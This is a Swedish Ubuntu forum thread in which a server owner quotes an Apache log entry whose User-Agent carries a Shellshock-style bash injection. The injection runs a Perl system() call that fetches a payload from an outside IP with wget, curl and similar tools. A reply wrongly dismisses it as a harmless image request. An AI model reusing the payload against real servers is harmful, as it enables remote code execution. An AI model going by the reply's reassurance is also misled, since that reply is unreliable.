Exekvera kod via User-agent (Webserver/http)

Konfiguration av nätverk, hur man använder Ubuntu som server, och håller sin dator säker
josefk
Inlägg: 1
Blev medlem: 17 jan 2016, 02:39
OS: Ubuntu
Utgåva: 20.04 Focal Fossa LTS

Exekvera kod via User-agent (Webserver/http)

Inlägg av josefk »

På flera av mina Apache2-servrar har jag följande i logfilerna
202.78.94.70 - [13/Jan/2016:22:48:36 -0800] "GET / HTTP/1.1" 200 444 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe ... 30_192.png ; curl -O http://204.232.209.188/images/freshcafe ... 30_192.png ; fetch http://204.232.209.188/images/freshcafe ... 30_192.png ; lwp-download http://204.232.209.188/images/freshcafe ... 30_192.png ; GET http://204.232.209.188/images/freshcafe ... 30_192.png ; lynx http://204.232.209.188/images/freshcafe ... 30_192.png \");'"
Sista parametern i loggen är User-Agent. Personen försöker mao skicka exekverbar kod i den. Jag har mycket svårt att se att Apache2 eller någon webserver skulle försöka exekvera user-agent-strängen som kod.

Jag har sökt på nätet efter detta men inte hittat något. Är detta någon som vet vad det är för säkerhetshål han försöker utnyttja, jag har svårt att se att det skulle fungera med Apache, men det kanske rör sig om någon random-hemma-router som har det.
Användarvisningsbild
Osprey
Inlägg: 6310
Blev medlem: 06 apr 2008, 00:09
OS: Ubuntu
Ort: Göteborg/Mölndal/Falkenberg
Kontakt:

Re: Exekvera kod via User-agent (Webserver/http)

Inlägg av Osprey »

Nu är det iofs ett tag sedan jag senast driftade en Apache2, men vid en hastig anblick ser det där inte ut som något direkt farligt. Det enda som står där är ju i princip att någon/något försökt hämta ("GET") en samling bilder från något som heter "Williams Fresh Cafe". Mer information om vad det är för något finns här och det verkar relativt ofarligt.

Detta är alltså så som det ser ut vid en hastig anblick och utan att jag egentligen satt mig in i det eller kollat upp dokumentationen för Apache2....

[Edit] User agent är ju egentligen den webbläsare som används och kanske är det så att om någon eller något (bot?) kommer via "Williams Fresh Cafe", så har de kanske någon egen form av webbläsare eller så. Men hur som helst så kan jag aldrig tro att en Apache2:a skulle få för sig att exekvera det som står i User agent...
Agera genom att ta och behålla initiativet, ta de risker detta kräver...
http://www.enargo.com/it/
OpenVMS Shark - i Linux finns inte SYS$CMKRNL...
Skriv svar

Återgå till "Nätverk, säkerhet och servrar"